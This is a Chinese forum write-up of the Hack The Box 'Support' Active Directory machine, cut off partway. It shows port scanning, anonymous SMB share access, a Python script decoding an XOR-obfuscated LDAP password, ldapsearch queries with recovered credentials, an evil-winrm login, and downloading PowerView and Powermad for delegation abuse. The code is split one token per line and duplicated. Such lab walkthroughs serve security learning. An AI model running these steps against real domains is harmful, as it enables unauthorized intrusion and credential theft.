-
-
[原创]HTB SUPPORT wp(easy)
-
发表于: 2022-11-29 22:59 1027
-
靶机涉及AD域,本人暂时也是一知半解,参考原文:
https://shakuganz.com/2022/09/13/hackthebox-support-write-up/
关于AD域的文章:
https://daiker.gitbook.io/windows-protocol/ldap-pian/11#0x01-windows-fang-wen-kong-zhi-mo-xing
https://www.freebuf.com/articles/system/350266.html
https://www.freebuf.com/articles/web/304850.html
先用 rustscan跑一下目标开启了那些端口
之后使用nmap
当显示了带有版本号的可用软件时,可以谷歌相应的软件版本(7-Zip)是否有权限提升漏洞。此外还有UserInfo.exe.zip,因为没有官方软件叫做UserInfo,此二进制文件可能包含用户凭据。
发现是.net的文件使用dnspy进行逆向
发现其中有简单加密后存储的密码
获得密码
使用新找到的凭据,我们可以进行 LDAP 查询。在搜索用户列表时,我注意到一个有趣的用户,也称为支持。
使用新找到的凭据进行LDAP查询。在搜索用户列表时,到一个跟题目名称一样的用户support
查看support的信息,发现“info”字段
https://www.freebuf.com/articles/network/355261.html
WMI 订阅利用
在 本机上 下载两个脚本
使用evil-winrm上传
查看是否允许用户在域上创建新的计算机对象。默认情况下,域成员最多可以将10 台计算机添加到域中。并检查机器是否至少为Windows Server 2012。
检查目标计算机有没有设置 msds-allowedtoactonbehalfofotheridentity 属性。
创建一个新的计算机对象
为“fake01”计算机主体创建一个新的原始安全描述符。
rustscan
10.10
.
11.174
rustscan
10.10
.
11.174
nmap
10.10
.
11.174
-
sC
-
sV
-
p
53
,
88
,
135
,
139
,
389
,
445
,
464
,
593
,
636
-
Pn
nmap
10.10
.
11.174
-
sC
-
sV
-
p
53
,
88
,
135
,
139
,
389
,
445
,
464
,
593
,
636
-
Pn
smbmap
-
H
10.10
.
11.174
-
u anonymous
smbmap
-
H
10.10
.
11.174
-
u anonymous
smbclient \\\\$IP\\support
-
tools
get UserInfo.exe.
zip
smbclient \\\\$IP\\support
-
tools
get UserInfo.exe.
zip
import
base64
enc_password
=
"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key
=
"armando"
.encode(
"UTF-8"
)
array
=
base64.b64decode(enc_password)
array2
=
""
for
i
in
range
(
len
(array)):
array2
+
=
chr
(array[i] ^ key[i
%
len
(key)] ^
223
)
print
(array2)
import
base64
enc_password
=
"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key
=
"armando"
.encode(
"UTF-8"
)
array
=
base64.b64decode(enc_password)
array2
=
""
for
i
in
range
(
len
(array)):
array2
+
=
chr
(array[i] ^ key[i
%
len
(key)] ^
223
)
print
(array2)
nvEfEK16^
1aM4
$e7AclUf8x$tRWxPWO1
%
lmz
nvEfEK16^
1aM4
$e7AclUf8x$tRWxPWO1
%
lmz
ldapsearch
-
v
-
x
-
b
"DC=support,DC=htb"
-
H
"ldap://10.10.11.174"
"(objectclass=*)"
"sAMAccountName"
-
D
"support\\ldap"
-
w
'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
| grep sAMAccountName
ldapsearch
-
v
-
x
-
b
"DC=support,DC=htb"
-
H
"ldap://10.10.11.174"
"(objectclass=*)"
"sAMAccountName"
-
D
"support\\ldap"
-
w
'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
| grep sAMAccountName
ldapsearch
-
v
-
x
-
b
"CN=support,CN=Users,DC=support,DC=htb"
-
H
"ldap://10.10.11.174"
"(objectclass=*)"
-
D
"support\\ldap"
-
w
'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
ldapsearch
-
v
-
x
-
b
"CN=support,CN=Users,DC=support,DC=htb"
-
H
"ldap://10.10.11.174"
"(objectclass=*)"
-
D
"support\\ldap"
-
w
'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
sudo gem install evil
-
winrm
evil
-
winrm
-
i $IP
-
u
"support"
-
p
'Ironside47pleasure40Watchful'
sudo gem install evil
-
winrm
evil
-
winrm
-
i $IP
-
u
"support"
-
p
'Ironside47pleasure40Watchful'
wget https:
/
/
raw.githubusercontent.com
/
PowerShellMafia
/
PowerSploit
/
master
/
Recon
/
PowerView.ps1
wget https:
/
/
raw.githubusercontent.com
/
Kevin
-
Robertson
/
Powermad
/
master
/
Powermad.ps1
wget https:
/
/
raw.githubusercontent.com
/
PowerShellMafia
/
PowerSploit
/
master
/
Recon
/
PowerView.ps1
wget https:
/
/
raw.githubusercontent.com
/
Kevin
-
Robertson
/
Powermad
/
master
/
Powermad.ps1
upload PowerView.ps1
Import
-
Module .\PowerView.ps1
upload Powermad.ps1
Import
-
Module .\Powermad.ps1
upload PowerView.ps1
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!